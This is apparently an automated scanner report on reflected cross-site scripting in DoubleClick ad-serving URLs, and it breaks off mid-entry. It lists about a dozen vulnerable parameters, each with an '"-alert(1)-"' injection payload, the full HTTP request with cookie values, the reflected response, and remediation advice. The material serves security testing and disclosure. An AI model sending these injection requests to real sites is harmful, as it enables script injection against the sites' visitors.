<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri Apr 22 18:09:39 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 3Bh%3Dv8/3af6/17/142/%2a/i%3B240368710%3B0-0%3B0%3B62889286%3B4307-300/250%3B41857116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189921da"-alert(1)-"2b438c71b84&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&ev ...[SNIP]...
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 274ae"-alert(1)-"d1dc0213438 was submitted in the sz parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206274ae"-alert(1)-"d1dc0213438&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.03&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.maxpreps.com/national/national.htm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri Apr 22 18:09:39 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/142/%2a/i%3B240368710%3B0-0%3B0%3B62889286%3B4307-300/250%3B41857116/41874903/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15206274ae"-alert(1)-"d1dc0213438&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&coun ...[SNIP]...
The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 34bb2"-alert(1)-"0a311c663df was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5865.149883.CBS_SPORTS/B5436755.8;sz=300x250;click0=http://adlog.com.com/adlog/e/r=15206&sg=511525&o=1%253a&h=cn&p=2&b=64&l=en_US&site=189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.0334bb2"-alert(1)-"0a311c663df&event=58/;ord=2011.04.27.23.37.03? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.maxpreps.com/national/national.htm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. --> <!-- Code auto-generated on Fri Apr 22 18:09:39 EDT 2011 --> <script src="http://s0.2mdn.net/879366/flashwrite_1_2 ...[SNIP]... 189&pt=2000&nd=&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e13:4DB805656B871&orh=maxpreps.com&oepartner=&epartner=&ppartner=&pdom=www.maxpreps.com&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.23.37.0334bb2"-alert(1)-"0a311c663df&event=58/http://www.facebook.com/adidasfootballus?sk=app_173775342656692"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var dcallowscriptaccess = "never" ...[SNIP]...
The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94324"-alert(1)-"1748ae9a2a5 was submitted in the b parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=494324"-alert(1)-"1748ae9a2a5&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 17/135/%2a/u%3B240444493%3B0-0%3B0%3B63339386%3B28248-880/150%3B41893239/41911026/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=494324"-alert(1)-"1748ae9a2a5&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36 ...[SNIP]...
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7eaff"-alert(1)-"f8172f1a73e was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=7eaff"-alert(1)-"f8172f1a73e&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 0%3B63339386%3B28248-880/150%3B41893239/41911026/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=7eaff"-alert(1)-"f8172f1a73e&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot. ...[SNIP]...
The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8052a"-alert(1)-"32c4cf8ad2b was submitted in the count parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=8052a"-alert(1)-"32c4cf8ad2b&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... ttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=8052a"-alert(1)-"32c4cf8ad2b&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg%3B2"); var fscUrl = url ...[SNIP]...
The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6d37b"-alert(1)-"8edc82da6c7 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=6d37b"-alert(1)-"8edc82da6c7&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... %3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=6d37b"-alert(1)-"8edc82da6c7&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg%3B2"); var fscUr ...[SNIP]...
The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6708"-alert(1)-"674d2ae8b1f was submitted in the e parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=a6708"-alert(1)-"674d2ae8b1f&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 86%3B28248-880/150%3B41893239/41911026/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=a6708"-alert(1)-"674d2ae8b1f&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox36 ...[SNIP]...
The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb190"-alert(1)-"7f74a479fc2 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=cb190"-alert(1)-"7f74a479fc2&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... pc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=cb190"-alert(1)-"7f74a479fc2&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumba ...[SNIP]...
The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 998a3"-alert(1)-"34e532c58d7 was submitted in the event parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=998a3"-alert(1)-"34e532c58d7 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... &pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=998a3"-alert(1)-"34e532c58d7http://www.gamespot.com/xbox360/action/call-of-juarez-the-cartel/video/6310177?tag=gumballs%3Bimg%3B2"); var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var d ...[SNIP]...
The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e65bb"-alert(1)-"7f77c1c983d was submitted in the h parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cne65bb"-alert(1)-"7f77c1c983d&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 8/3af6/17/135/%2a/u%3B240444493%3B0-0%3B0%3B63339386%3B28248-880/150%3B41893239/41911026/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cne65bb"-alert(1)-"7f77c1c983d&p=&b=4&l=&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.2 ...[SNIP]...
The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 75d78"-alert(1)-"80dfafc695d was submitted in the l parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adi/N5996.2496.0512158326521/B5372452.2;sz=880x150;pc=cbs511584;click0=http://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=75d78"-alert(1)-"80dfafc695d&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34&event=58/;ord=2011.04.27.23.36.34? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.gamespot.com/ User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257
<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserve ...[SNIP]... 135/%2a/u%3B240444493%3B0-0%3B0%3B63339386%3B28248-880/150%3B41893239/41911026/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511584%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13369&sg=511584&o=1%253A&h=cn&p=&b=4&l=75d78"-alert(1)-"80dfafc695d&site=6&pt=2000&nd=1&pid=&cid=&pp=100&e=&rqid=00c13-ad-e5:4DB84258741A4F&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=6ThqigoPCX4AAGgqHuYAAAAE&t=2011.04.27.23.36.34 ...[SNIP]...
The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5182"-alert(1)-"9f574a3cb9c was submitted in the nd parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
